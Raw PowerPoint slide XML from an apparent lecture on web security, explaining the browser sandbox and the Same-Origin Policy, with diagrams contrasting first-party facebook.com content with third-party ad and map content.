              <a:rPr lang="en-GB" sz="2400" dirty="0"/>
              <a:t>Why would running JavaScript not be?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00" y="2003003"/>
            <a:ext cx="6391488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5895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Two security measures for JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: Sandbox &amp; SOP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46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Groep 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2051720" y="1109245"/>
            <a:ext cx="5256584" cy="3831924"/>
            <a:chOff x="1403648" y="1196751"/>
            <a:chExt cx="5976664" cy="4998329"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Afbeelding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1" t="9647" r="3371" b="12360"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403648" y="1196751"/>
              <a:ext cx="5976664" cy="4998329"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rechthoek 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1691680" y="2049827"/>
              <a:ext cx="5400600" cy="38884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18" name="Groep 17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2674132" y="2133864"/>
            <a:ext cx="3816424" cy="2304256"/>
            <a:chOff x="2195736" y="2420888"/>
            <a:chExt cx="4176464" cy="2520280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rechthoek 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2195736" y="2420888"/>
              <a:ext cx="4176464" cy="252028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  <a:p>
              <a:pPr algn="ctr"/>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB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Browser sandbox  </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rechthoek 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4433134" y="2766219"/>
              <a:ext cx="1652685" cy="165618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n-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr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sandbox for</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent6">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>ad.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Rechthoek 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2345329" y="2771536"/>
              <a:ext cx="1938212" cy="165489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/>
              <a:endParaRPr lang="en-GB" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>sandbox for</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="008000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>facebook.com</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Freeform 56"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3146492" y="2956801"/>
              <a:ext cx="78801" cy="637509"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 2305 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 3650 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 5764 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 7300 h 534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70" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="5345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3" name="Freeform 56"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5198233" y="2878043"/>
              <a:ext cx="61244" cy="716267"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212770"/>
                <a:gd name="T1" fmla="*/ 0 h 534572"/>
                <a:gd name="T2" fmla="*/ 0 w 212770"/>
                <a:gd name="T3" fmla="*/ 2305 h 534572"/>
                <a:gd name="T4" fmla="*/ 0 w 212770"/>
                <a:gd name="T5" fmla="*/ 3650 h 534572"/>
                <a:gd name="T6" fmla="*/ 0 w 212770"/>
                <a:gd name="T7" fmla="*/ 5764 h 534572"/>
                <a:gd name="T8" fmla="*/ 0 w 212770"/>
                <a:gd name="T9" fmla="*/ 7300 h 5345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2770" h="534572">
                  <a:moveTo>
                    <a:pt x="57291" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="139352" y="62132"/>
                    <a:pt x="221414" y="124264"/>
                    <a:pt x="212036" y="168812"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="202658" y="213360"/>
                    <a:pt x="15088" y="225083"/>
                    <a:pt x="1020" y="267286"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="-13048" y="309489"/>
                    <a:pt x="122941" y="377484"/>
                    <a:pt x="127630" y="422031"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132319" y="466578"/>
                    <a:pt x="5710" y="525194"/>
                    <a:pt x="29156" y="534572"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="571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 dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Tekstvak 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115616" y="4898063"/>
            <a:ext cx="9901685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Browser sandbox </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>for webpage as a whole</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F07040305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Same Origin Policy (SOP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                                                                                                </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>One sandbox per origin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="663300"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ad.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, …)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15" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4102221" y="2229788"/>
            <a:ext cx="1096164" cy="685486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25" name="Afbeelding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46" y="2047613"/>
            <a:ext cx="719934" cy="76078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AD792E8-5513-7FB2-7EE5-46D061DDF0FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5840380" y="739774"/>
            <a:ext cx="1941568" cy="1575354"/>
            <a:chOff x="5840380" y="739774"/>
            <a:chExt cx="1941568" cy="1575354"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="Afbeelding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576" y="1093464"/>
              <a:ext cx="1156071" cy="1221664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DE61C8D-A9BC-CA78-2FED-FD24F738345C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5840380" y="739774"/>
              <a:ext cx="1941568" cy="1486847"/>
              <a:chOff x="5840380" y="739774"/>
              <a:chExt cx="1941568" cy="1486847"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="16" name="CustomShape 13"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5840380" y="1465839"/>
                <a:ext cx="1941568" cy="760782"/>
              </a:xfrm>
              <a:prstGeom prst="curvedDown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rgbClr val="FF0000"/>
              </a:solidFill>
              <a:ln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26" name="Tekstvak 25"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7336064" y="739774"/>
                <a:ext cx="32892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>
                    <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>1</a:t>
                </a:r>
                <a:endParaRPr lang="en-GB" dirty="0">
                  <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Tekstvak 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4661931" y="1717165"/>
            <a:ext cx="328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Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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61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Security measures for JavaScript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Two levels of protection against malicious or buggy JavaScript built into the browser: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Sandbox provided by the browser </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>protects the browser from JavaScript code in webpages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1800" dirty="0"/>
              <a:t>JavaScript code can change anything in a webpage, but cannot access other functionality of the browser, e.g. changing the address bar, accessing the file system, etc.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33CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Same-Origin-Policy (SOP)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>This prevents code from one origin from messing with content from another origin (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ru.nl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800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1131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67640" y="18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b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" baseline="30000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" strike="noStrike" spc="-1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> party content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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0415C0-6A13-44C7-8A94-44C174F178B4}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" b="0" strike="noStrike" spc="-1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>48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6707925" y="3356992"/>
            <a:ext cx="1824075" cy="20162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 err="1">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>facebook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" spc="-1" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1478640" y="2997941"/>
            <a:ext cx="523072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05" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974399" y="3911716"/>
            <a:ext cx="1626414" cy="7771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06" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5004362" y="4091121"/>
            <a:ext cx="1565190" cy="661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07" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1406074" y="3290003"/>
            <a:ext cx="519032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42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13" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6117598" y="1598291"/>
            <a:ext cx="2193086" cy="4604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advertising.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="CustomShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4933400" y="1657016"/>
            <a:ext cx="1100700" cy="14648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17" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4951287" y="1198158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7" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6076604" y="990622"/>
            <a:ext cx="2234080" cy="522271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="006600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maps.google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="0" strike="noStrike" spc="-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011975" y="2359767"/>
            <a:ext cx="2816427" cy="2370600"/>
            <a:chOff x="3021469" y="3278868"/>
            <a:chExt cx="2067965" cy="2271612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3021469" y="3278868"/>
              <a:ext cx="2067965" cy="227161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1800" b="0" strike="noStrike" spc="-1" dirty="0"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400" spc="-1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facebook</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400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content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2400" b="0" strike="noStrike" spc="-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4" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3100324" y="4227009"/>
              <a:ext cx="841388" cy="77763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other</a:t>
              </a:r>
            </a:p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user’s</a:t>
              </a:r>
            </a:p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content</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4393846" y="4216422"/>
              <a:ext cx="559208" cy="2959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ad</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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8" name="CustomShape 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3873168" y="3885150"/>
              <a:ext cx="632723" cy="301252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="006600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map</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="16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33661" y="3288111"/>
              <a:ext cx="2044437" cy="459951"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="309" name="CustomShape 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3941712" y="4405403"/>
              <a:ext cx="439616" cy="515600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7" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4962707" y="1398045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8" name="CustomShape 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4945910" y="1933619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41" name="Rechthoek 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7027878" y="3592459"/>
            <a:ext cx="1124881" cy="10099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42" name="Rechthoek 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7114784" y="3687958"/>
            <a:ext cx="1145088" cy="104240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189940" y="3773356"/>
            <a:ext cx="1251511" cy="104188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5065" b="55141"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2036204" y="2359768"/>
            <a:ext cx="2784383" cy="485962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086182" y="892070"/>
            <a:ext cx="254492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3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" baseline="30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rd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party content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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>different</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> origins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Rechte verbindingslijn met pijl 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3478600" y="1729650"/>
            <a:ext cx="213507" cy="12628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>
            <a:endCxn id="26" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3978385" y="1755325"/>
            <a:ext cx="283476" cy="15828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599377" y="876118"/>
            <a:ext cx="23550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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" b="1" baseline="30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st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party content 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from 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same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>here facebook.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="47" name="Rechte verbindingslijn met pijl 46"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2292656" y="1814112"/>
            <a:ext cx="407136" cy="15351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/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="347852" y="2468677"/>
            <a:ext cx="1078454" cy="1628732"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="Tekstvak 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7111701" y="2979462"/>
            <a:ext cx="1277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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" baseline="30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st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party </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:latin typeface="Arial Rounded MT Bold" panose="020F0704030504030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
